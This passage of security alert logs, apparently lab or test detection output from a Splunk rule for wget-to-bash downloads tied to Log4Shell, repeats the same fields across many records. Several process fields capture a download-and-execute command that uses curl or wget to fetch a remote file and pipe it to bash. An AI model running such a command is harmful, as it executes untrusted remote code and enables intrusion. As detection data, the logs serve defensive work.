CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", 